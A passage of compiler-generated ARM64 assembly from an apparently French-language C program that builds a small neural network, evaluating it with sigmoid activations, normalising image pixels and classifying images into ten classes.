mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #60]
str d0, [x8, x9, lsl #3]
b LBB3_23
LBB3_23: ; in Loop: Header=BB3_21 Depth=3
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #60]
b LBB3_21
LBB3_24: ; in Loop: Header=BB3_19 Depth=2
b LBB3_25
LBB3_25: ; in Loop: Header=BB3_19 Depth=2
ldr w8, [sp, #56]
add w8, w8, #1
str w8, [sp, #56]
b LBB3_19
LBB3_26: ; in Loop: Header=BB3_11 Depth=1
ldur x0, [x29, #-8]
ldr x1, [sp, #48]
bl _addLayerToNetwork
ldur x1, [x29, #-56]
mov x0, #0
bl _strtok
str x0, [sp, #64]
b LBB3_11
LBB3_27:
ldur x0, [x29, #-32]
bl _free
ldp x29, x30, [sp, #128] ; 16-byte Folded Reload
add sp, sp, #144
ret
.cfi_endproc
; -- End function
.globl _addLayerToNetwork ; -- Begin function addLayerToNetwork
.p2align 2
_addLayerToNetwork: ; @addLayerToNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
ldr x0, [sp, #16]
bl _initNOEUD
str x0, [sp, #8]
ldr x8, [sp, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldr x9, [sp, #8]
str x8, [x9, #16]
ldur x8, [x29, #-8]
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
ldr x8, [sp, #8]
ldur x9, [x29, #-8]
ldr x9, [x9, #16]
str x8, [x9, #8]
ldr x8, [sp, #8]
ldr x8, [x8, #16]
ldr x8, [x8]
ldr w8, [x8, #20]
ldr x9, [sp, #8]
ldr x9, [x9]
str w8, [x9, #16]
b LBB4_3
LBB4_2:
ldr x8, [sp, #8]
ldur x9, [x29, #-8]
str x8, [x9, #8]
b LBB4_3
LBB4_3:
ldr x8, [sp, #8]
ldur x9, [x29, #-8]
str x8, [x9, #16]
ldur x9, [x29, #-8]
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _initNOEUD ; -- Begin function initNOEUD
.p2align 2
_initNOEUD: ; @initNOEUD
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
mov x0, #24
bl _malloc
stur x0, [x29, #-16]
mov x0, #32
bl _malloc
ldur x8, [x29, #-16]
str x0, [x8]
ldur x8, [x29, #-8]
ldrsw x8, [x8, #16]
lsl x0, x8, #3
bl _malloc
ldur x8, [x29, #-16]
ldr x8, [x8]
str x0, [x8]
ldur x8, [x29, #-8]
ldrsw x8, [x8, #20]
lsl x0, x8, #3
bl _malloc
ldur x8, [x29, #-16]
ldr x8, [x8]
str x0, [x8, #8]
ldur x8, [x29, #-8]
ldrsw x8, [x8, #20]
mov x9, #48
mul x0, x8, x9
bl _malloc
ldur x8, [x29, #-16]
ldr x8, [x8]
str x0, [x8, #24]
stur wzr, [x29, #-20]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-20]
ldur x9, [x29, #-8]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_4
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-20]
mov x10, #48
str x10, [sp, #24] ; 8-byte Folded Spill
mul x9, x9, x10
ldrsw x0, [x8, x9]
mov x1, #8
str x1, [sp, #16] ; 8-byte Folded Spill
bl _calloc
ldr x1, [sp, #16] ; 8-byte Folded Reload
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-20]
mul x9, x9, x10
add x8, x8, x9
str x0, [x8, #16]
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-20]
mul x9, x9, x10
ldrsw x0, [x8, x9]
bl _calloc
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-20]
mul x9, x9, x10
add x8, x8, x9
str x0, [x8, #40]
b LBB5_3
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB5_1
LBB5_4:
stur wzr, [x29, #-24]
b LBB5_5
LBB5_5: ; =>This Loop Header: Depth=1
; Child Loop BB5_7 Depth 2
ldur w8, [x29, #-24]
ldur x9, [x29, #-8]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_12
b LBB5_6
LBB5_6: ; in Loop: Header=BB5_5 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mov x11, #48
str x11, [sp, #8] ; 8-byte Folded Spill
mul x9, x9, x11
add x8, x8, x9
ldr d0, [x8, #8]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x11
add x8, x8, x9
str d0, [x8, #8]
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x11
add x8, x8, x9
ldr d0, [x8, #32]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x11
add x8, x8, x9
str d0, [x8, #32]
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x11
add x8, x8, x9
ldr d0, [x8, #24]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x11
add x8, x8, x9
str d0, [x8, #24]
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x11
ldr w8, [x8, x9]
ldur x9, [x29, #-16]
ldr x9, [x9]
ldr x9, [x9, #24]
ldursw x10, [x29, #-24]
mul x10, x10, x11
str w8, [x9, x10]
stur wzr, [x29, #-28]
b LBB5_7
LBB5_7: ; Parent Loop BB5_5 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-28]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
ldursw x10, [x29, #-24]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_10
b LBB5_8
LBB5_8: ; in Loop: Header=BB5_7 Depth=2
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldursw x9, [x29, #-28]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldursw x9, [x29, #-28]
str d0, [x8, x9, lsl #3]
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #40]
ldursw x9, [x29, #-28]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-24]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #40]
ldursw x9, [x29, #-28]
str d0, [x8, x9, lsl #3]
b LBB5_9
LBB5_9: ; in Loop: Header=BB5_7 Depth=2
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB5_7
LBB5_10: ; in Loop: Header=BB5_5 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
ldursw x9, [x29, #-24]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8, #8]
ldursw x9, [x29, #-24]
str d0, [x8, x9, lsl #3]
b LBB5_11
LBB5_11: ; in Loop: Header=BB5_5 Depth=1
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB5_5
LBB5_12:
str wzr, [sp, #32]
b LBB5_13
LBB5_13: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #32]
ldur x9, [x29, #-8]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_16
b LBB5_14
LBB5_14: ; in Loop: Header=BB5_13 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8]
ldrsw x9, [sp, #32]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-16]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp, #32]
str d0, [x8, x9, lsl #3]
b LBB5_15
LBB5_15: ; in Loop: Header=BB5_13 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB5_13
LBB5_16:
ldur x8, [x29, #-8]
ldr w8, [x8, #16]
ldur x9, [x29, #-16]
ldr x9, [x9]
str w8, [x9, #16]
ldur x8, [x29, #-8]
ldr w8, [x8, #20]
ldur x9, [x29, #-16]
ldr x9, [x9]
str w8, [x9, #20]
ldur x8, [x29, #-16]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldur x8, [x29, #-16]
str xzr, [x8, #16]
ldur x0, [x29, #-16]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _estVideNetwork ; -- Begin function estVideNetwork
.p2align 2
_estVideNetwork: ; @estVideNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
and w0, w8, #0x1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _VerificationReseau ; -- Begin function VerificationReseau
.p2align 2
_VerificationReseau: ; @VerificationReseau
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x0, [x29, #-16]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fopen
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB7_2
b LBB7_1
LBB7_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB7_2:
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #40]
str wzr, [sp, #36]
b LBB7_3
LBB7_3: ; =>This Loop Header: Depth=1
; Child Loop BB7_5 Depth 2
; Child Loop BB7_7 Depth 3
ldr w8, [sp, #36]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_14
b LBB7_4
LBB7_4: ; in Loop: Header=BB7_3 Depth=1
ldur x0, [x29, #-24]
ldr x8, [sp, #40]
ldr x8, [x8]
ldr w8, [x8, #16]
; implicit-def: $x10
mov x10, x8
ldr x8, [sp, #40]
ldr x8, [x8]
ldr w9, [x8, #20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _fprintf
str wzr, [sp, #32]
b LBB7_5
LBB7_5: ; Parent Loop BB7_3 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB7_7 Depth 3
ldr w8, [sp, #32]
ldr x9, [sp, #40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_12
b LBB7_6
LBB7_6: ; in Loop: Header=BB7_5 Depth=2
ldr x8, [sp, #40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #32]
mov x10, #48
mul x9, x9, x10
ldr w8, [x8, x9]
stur w8, [x29, #-28]
ldur x0, [x29, #-24]
ldr x8, [sp, #40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #32]
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
mov x8, sp
str d0, [x8]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fprintf
str wzr, [sp, #28]
b LBB7_7
LBB7_7: ; Parent Loop BB7_3 Depth=1
; Parent Loop BB7_5 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #28]
ldur w9, [x29, #-28]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_10
b LBB7_8
LBB7_8: ; in Loop: Header=BB7_7 Depth=3
ldur x0, [x29, #-24]
ldr x8, [sp, #40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #32]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #28]
ldr d0, [x8, x9, lsl #3]
mov x8, sp
str d0, [x8]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fprintf
b LBB7_9
LBB7_9: ; in Loop: Header=BB7_7 Depth=3
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB7_7
LBB7_10: ; in Loop: Header=BB7_5 Depth=2
ldur x0, [x29, #-24]
ldr x8, [sp, #40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #32]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldur w9, [x29, #-28]
subs w9, w9, #1
ldr d0, [x8, w9, sxtw #3]
mov x8, sp
str d0, [x8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
b LBB7_11
LBB7_11: ; in Loop: Header=BB7_5 Depth=2
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB7_5
LBB7_12: ; in Loop: Header=BB7_3 Depth=1
ldr x8, [sp, #40]
ldr x8, [x8, #8]
str x8, [sp, #40]
b LBB7_13
LBB7_13: ; in Loop: Header=BB7_3 Depth=1
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB7_3
LBB7_14:
ldur x0, [x29, #-24]
bl _fclose
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.globl _evalNetwork ; -- Begin function evalNetwork
.p2align 2
_evalNetwork: ; @evalNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
movi d0, #0000000000000000
stur d0, [x29, #-24]
str d0, [sp, #32]
str wzr, [sp, #28]
; kill: def $x8 killed $xzr
str xzr, [sp, #16]
str wzr, [sp, #12]
b LBB8_1
LBB8_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur x9, [x29, #-8]
ldr x9, [x9, #8]
ldr x9, [x9]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_4
b LBB8_2
LBB8_2: ; in Loop: Header=BB8_1 Depth=1
ldur x8, [x29, #-16]
ldrsw x9, [sp, #12]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp, #12]
str d0, [x8, x9, lsl #3]
b LBB8_3
LBB8_3: ; in Loop: Header=BB8_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB8_1
LBB8_4:
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #16]
str wzr, [sp, #28]
b LBB8_5
LBB8_5: ; =>This Loop Header: Depth=1
; Child Loop BB8_7 Depth 2
; Child Loop BB8_9 Depth 3
; Child Loop BB8_16 Depth 2
ldr w8, [sp, #28]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_24
b LBB8_6
LBB8_6: ; in Loop: Header=BB8_5 Depth=1
str wzr, [sp, #8]
b LBB8_7
LBB8_7: ; Parent Loop BB8_5 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB8_9 Depth 3
ldr w8, [sp, #8]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_14
b LBB8_8
LBB8_8: ; in Loop: Header=BB8_7 Depth=2
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #8]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
stur d0, [x29, #-24]
str wzr, [sp, #4]
b LBB8_9
LBB8_9: ; Parent Loop BB8_5 Depth=1
; Parent Loop BB8_7 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #4]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_12
b LBB8_10
LBB8_10: ; in Loop: Header=BB8_9 Depth=3
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp, #4]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #8]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #4]
ldr d1, [x8, x9, lsl #3]
ldur d2, [x29, #-24]
fmadd d0, d0, d1, d2
stur d0, [x29, #-24]
b LBB8_11
LBB8_11: ; in Loop: Header=BB8_9 Depth=3
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB8_9
LBB8_12: ; in Loop: Header=BB8_7 Depth=2
ldur d0, [x29, #-24]
fneg d0, d0
bl _exp
fmov d1, d0
fmov d0, #1.00000000
fadd d1, d0, d1
fdiv d0, d0, d1
str d0, [sp, #32]
ldr d0, [sp, #32]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #8]
ldrsw x9, [sp, #8]
str d0, [x8, x9, lsl #3]
b LBB8_13
LBB8_13: ; in Loop: Header=BB8_7 Depth=2
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB8_7
LBB8_14: ; in Loop: Header=BB8_5 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_20
b LBB8_15
LBB8_15: ; in Loop: Header=BB8_5 Depth=1
str wzr, [sp]
b LBB8_16
LBB8_16: ; Parent Loop BB8_5 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_19
b LBB8_17
LBB8_17: ; in Loop: Header=BB8_16 Depth=2
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #8]
ldrsw x9, [sp]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldr x8, [x8, #8]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp]
str d0, [x8, x9, lsl #3]
b LBB8_18
LBB8_18: ; in Loop: Header=BB8_16 Depth=2
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB8_16
LBB8_19: ; in Loop: Header=BB8_5 Depth=1
b LBB8_20
LBB8_20: ; in Loop: Header=BB8_5 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB8_22
b LBB8_21
LBB8_21:
b LBB8_24
LBB8_22: ; in Loop: Header=BB8_5 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
str x8, [sp, #16]
b LBB8_23
LBB8_23: ; in Loop: Header=BB8_5 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB8_5
LBB8_24:
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x0, [x8, #8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _imgClass ; -- Begin function imgClass
.p2align 2
_imgClass: ; @imgClass
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str wzr, [sp, #20]
movi d0, #0000000000000000
str d0, [sp, #8]
str wzr, [sp, #4]
b LBB9_1
LBB9_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB9_6
b LBB9_2
LBB9_2: ; in Loop: Header=BB9_1 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #4]
ldr d0, [x8, x9, lsl #3]
ldr d1, [sp, #8]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB9_4
b LBB9_3
LBB9_3: ; in Loop: Header=BB9_1 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #4]
ldr d0, [x8, x9, lsl #3]
str d0, [sp, #8]
ldr w8, [sp, #4]
str w8, [sp, #20]
b LBB9_4
LBB9_4: ; in Loop: Header=BB9_1 Depth=1
b LBB9_5
LBB9_5: ; in Loop: Header=BB9_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB9_1
LBB9_6:
ldr w0, [sp, #20]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function imgNormalisation
lCPI10_0:
.quad 0x406fe00000000000 ; double 255
.section __TEXT,__text,regular,pure_instructions
.globl _imgNormalisation
.p2align 2
_imgNormalisation: ; @imgNormalisation
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
ldursw x0, [x29, #-12]
mov x1, #8
bl _calloc
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB10_1
LBB10_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB10_4
b LBB10_2
LBB10_2: ; in Loop: Header=BB10_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #4]
ldr s1, [x8, x9, lsl #2]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
adrp x8, lCPI10_0@PAGE
ldr d1, [x8, lCPI10_0@PAGEOFF]
fdiv d0, d0, d1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
str d0, [x8, x9, lsl #3]
b LBB10_3
LBB10_3: ; in Loop: Header=BB10_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB10_1
LBB10_4:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _loadcsv ; -- Begin function loadcsv
.p2align 2
_loadcsv: ; @loadcsv
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
str x1, [sp, #16]
; kill: def $x8 killed $xzr
str xzr, [sp, #8]
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
ldur w8, [x29, #-4]
subs w8, w8, #4
cset w8, ne
tbnz w8, #0, LBB11_13
b LBB11_1
LBB11_1:
ldr x8, [sp, #16]
ldr x0, [x8, #8]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB11_13
b LBB11_2
LBB11_2:
ldr x8, [sp, #16]
ldr x0, [x8, #16]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB11_6
b LBB11_3
LBB11_3:
ldr x8, [sp, #16]
ldr x0, [x8, #24]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
str x0, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB11_5
b LBB11_4
LBB11_4:
ldr x8, [sp, #16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB11_5:
b LBB11_12
LBB11_6:
ldr x8, [sp, #16]
ldr x0, [x8, #16]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB11_10
b LBB11_7
LBB11_7:
ldr x8, [sp, #16]
ldr x0, [x8, #24]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
str x0, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB11_9
b LBB11_8
LBB11_8:
ldr x8, [sp, #16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB11_9:
b LBB11_11
LBB11_10:
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB11_11:
b LBB11_12
LBB11_12:
b LBB11_14
LBB11_13:
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB11_14:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _initNode ; -- Begin function initNode
.p2align 2
_initNode: ; @initNode
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8] ; 8-byte Folded Spill
mov x0, #40
bl _malloc
mov x8, x0
ldr x0, [sp, #8] ; 8-byte Folded Reload
stur x8, [x29, #-8]
ldrsw x8, [x0, #24]
lsl x0, x8, #2
bl _malloc
ldur x8, [x29, #-8]
str x0, [x8, #16]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB12_2
b LBB12_1
LBB12_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.16@PAGE
add x1, x1, l_.str.16@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB12_2:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr w9, [x8, #12]
ldur x10, [x29, #-8]
str w9, [x10, #12]
ldr w9, [x8, #8]
ldur x10, [x29, #-8]
str w9, [x10, #8]
ldr w9, [x8, #4]
ldur x10, [x29, #-8]
str w9, [x10, #4]
ldr w9, [x8, #24]
ldur x10, [x29, #-8]
str w9, [x10, #24]
ldr w8, [x8]
ldur x9, [x29, #-8]
str w8, [x9]
stur wzr, [x29, #-12]
b LBB12_3
LBB12_3: ; =>This Inner Loop Header: Depth=1
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldur w8, [x29, #-12]
ldr w9, [x9, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB12_6
b LBB12_4
LBB12_4: ; in Loop: Header=BB12_3 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x8, [x8, #16]
ldursw x9, [x29, #-12]
ldr w8, [x8, x9, lsl #2]
ldur x9, [x29, #-8]
ldr x9, [x9, #16]
ldursw x10, [x29, #-12]
